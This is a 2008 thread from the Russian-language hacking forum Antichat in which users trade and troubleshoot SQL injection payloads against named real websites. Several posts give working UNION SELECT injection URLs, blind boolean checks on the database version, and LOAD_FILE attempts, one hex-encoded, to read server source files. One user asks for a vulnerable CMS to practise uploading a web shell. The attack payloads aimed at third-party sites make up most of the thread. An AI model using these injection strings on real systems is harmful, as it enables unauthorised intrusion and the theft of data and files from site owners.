ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.03.2008, 21:13
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*
Forbidden
You don't have permission to access /browse.php on this server.
Хотя user(),database(),version() выполняются
Последний раз редактировалось ReVOLVeR; 21.03.2008 в 21:18..
|
|
|
21.03.2008, 21:15
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от ReVOLVeR
http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*
Forbidden
You don't have permission to access /browse.php on this server.
Хотя user(),database(),version() выполняются
Ты че издеваешься?  INFORMATION_SCHEMA ?
http://securityvulns.ru/Fnews675.html читай если нет (если да... то хм..)
Последний раз редактировалось xcedz; 21.03.2008 в 21:20..
|
|
|
|
21.03.2008, 21:30
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от ReVOLVeR
http://link.raid.ru/browse.php?cat=-1+SELECT TABLE_SCHEMA,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS/*
Forbidden
You don't have permission to access /browse.php on this server.
Хотя user(),database(),version() выполняются
Там мукул четвертый, information_schema там нет.
PHP код:
http://link.raid.ru/browse.php?cat=-1+union+select+table_name+from+information_schema.tables/*
Последний раз редактировалось .Begemot.; 21.03.2008 в 22:22..
|
|
|
|
21.03.2008, 21:23
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
тьфу блин тупею...
|
|
|
|
21.03.2008, 21:49
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
http://www.fevralka.ru/index.php?area=1&p=gallery&action=showimages&galid =2+and+ascii(lower(substring((select+version( )),1,1)))=0x35/*
можно ли этим способом вывести строчку или какой нить символ чтобы можно было увидеть инъекцию?
|
|
|
|
21.03.2008, 21:54
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Там мукул четвертый, скорее всего information_schema там нет.
гыгыгыг, ога, information_schema это такая непостоянная фигня, где заочет там и появляется, обычно она в пятой версии но иногда и в 4, хотя скорее всего там нет
пиздец!
|
|
|
|
21.03.2008, 22:16
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи
|
|
|
|
22.03.2008, 16:51
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от jokester
2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи
не проще
PHP код:
and 5=substring(version(),1,1)
? =\
__________________
|
|
|
|
21.03.2008, 22:24
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
jokester, спасибо за ответ, статьи читал, пишу скрипт, вывожу текст на страницу потом ищу его если есть то все ок, вот пытаюсь воткнуть как в этом методе это можно реализовать
|
|
|
|
22.03.2008, 16:54
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
Здравствуйте, у меня два вопроса,
Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.
Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.
Сам сайт -
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE('/var/www/web7/web/show_videos.php'),3/*
- так ошибка мускула
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE(0x2f7661722f7777772f 776562372f7765622f73686f775f766964656f732e706870), 3/*
- так цифра не отображается
Там прав на чтение не хватает или что-то другое?
Последний раз редактировалось Spaise; 22.03.2008 в 16:56..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид